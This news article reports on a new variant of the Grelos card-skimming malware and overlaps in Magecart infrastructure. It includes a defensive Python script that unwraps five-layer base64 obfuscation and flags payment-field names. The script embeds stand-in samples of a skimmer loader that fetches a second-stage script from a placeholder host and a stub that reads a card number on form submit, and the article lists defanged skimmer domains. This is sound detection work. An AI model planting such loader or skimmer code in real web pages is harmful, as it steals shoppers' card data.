19 November 2020

New variant of card-skimming Grelos malware illustrates overlaps in Magecart infrastructure and groups


A new version of Grelos, a malware associated with Magecart card skimming campaigns, has demonstrated how intricacies and overlaps in infrastructure could create a "murkiness," which makes it harder for security researchers to track separate Magecart groups.

The Grelos skimmer appeared on the threat landscape in 2015 and was previously linked to Magecart Group 1-2; however, this skimmer was also observed in attacks by other threat actors. The latest Grelos version detailed by RiskIQ contains "a rehash" of the original code first seen in 2015-16, consisting of a loader and a skimmer, "both of which are base64 encoded five times over."
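The "base64 encoded five times over" detail is the part of this report a defender can act on directly: nested encoding hides the skimmer's strings from simple grep-style checks, but the layers can be peeled off mechanically. The script below is an added example written for this article, not RiskIQ's tooling or any Grelos code. It unwraps an arbitrary number of base64 layers from a suspicious script blob and then looks for references to payment-form fields in the recovered text. The sample loader and skimmer strings are constructed stand-ins (note the `example.invalid` hostname) that only imitate the loader-plus-skimmer shape described above; the field-name pattern is a hypothetical heuristic, not a signature taken from the report.

```python
import base64
import binascii
import re

# Constructed samples (not Grelos code): a benign stand-in for a loader that
# pulls a second-stage script, and a stand-in for a skimmer that reads a
# payment field. The hostname is deliberately non-routable.
SAMPLE_LOADER_SOURCE = (
    'var s=document.createElement("script");'
    's.src="https://example.invalid/second-stage.js";'
    'document.head.appendChild(s);'
)
SAMPLE_SKIMMER_SOURCE = (
    'document.querySelector("form").addEventListener("submit",function(){'
    'var cc=document.getElementsByName("cardnumber")[0].value;});'
)

# Hypothetical heuristic: field names a card skimmer is likely to touch.
CARD_FIELD_PATTERN = re.compile(
    r"cardnumber|card_number|ccnum|cvv|cvc|expir", re.IGNORECASE
)


def wrap_base64(text: str, layers: int) -> str:
    """Encode text in `layers` nested base64 layers.

    Used only to build test input that mimics the obfuscation described in
    the article; an analyst would normally start from a captured blob.
    """
    data = text.encode("utf-8")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


def peel_base64(blob: str, max_layers: int = 16):
    """Strip nested base64 layers until the content stops decoding cleanly.

    Returns (plaintext, layers_removed). Whitespace is ignored because some
    encoders wrap lines. Input that is not base64 at all is returned
    unchanged with layers_removed == 0; `max_layers` bounds the loop so a
    pathological blob cannot spin forever.
    """
    current = blob
    layers = 0
    while layers < max_layers:
        candidate = re.sub(r"\s+", "", current)
        try:
            # validate=True rejects any character outside the base64
            # alphabet, so real script text (quotes, parentheses, semicolons)
            # terminates the loop instead of decoding to garbage.
            decoded = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            break
        if not decoded:
            break
        current = decoded
        layers += 1
    return current, layers


def analyze(blob: str) -> dict:
    """Unwrap a blob and report encoding depth plus payment-field references."""
    script, layers = peel_base64(blob)
    indicators = sorted({m.group(0).lower() for m in CARD_FIELD_PATTERN.finditer(script)})
    return {"layers": layers, "indicators": indicators, "script": script}


if __name__ == "__main__":
    # Build a five-layer blob like the one the report describes, then unwrap it.
    blob = wrap_base64(SAMPLE_SKIMMER_SOURCE, 5)
    report = analyze(blob)
    print(f"layers removed: {report['layers']}")
    print(f"payment-field references: {report['indicators']}")
    print(f"recovered script: {report['script'][:60]}...")
```

Run against a captured inline script or a fetched JavaScript file, the `layers` count alone is a useful triage signal: legitimate page code is rarely base64-wrapped even once, so anything that unwraps several layers deserves a closer look regardless of what the field-name heuristic finds.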

The new skimmer variant was uncovered while investigating domains associated with a recent attack against boom! Mobile's website, in which the Full(z) House group injected a skimmer into the website to steal customer data. The domains used in this campaign led the team to a cookie and associated skimmer websites, including facebookapimanager[.]com and googleapimanager[.]com. However, a closer inspection revealed samples of a recent variant of the Grelos skimmer, not the Full(z) House malware.

"In several recent Magecart compromises, we have seen increasing overlaps in infrastructure used to host various skimmers that are unrelated in terms of the techniques and code structures they employ," said RiskIQ. "We also observe new variants of skimmers reusing code seen over the last several years."

Different skimmer variants linked to Grelos have been "using the same infrastructure or other connections through WHOIS records and other malicious activities, such as phishing and malware during this investigation," the researchers said.
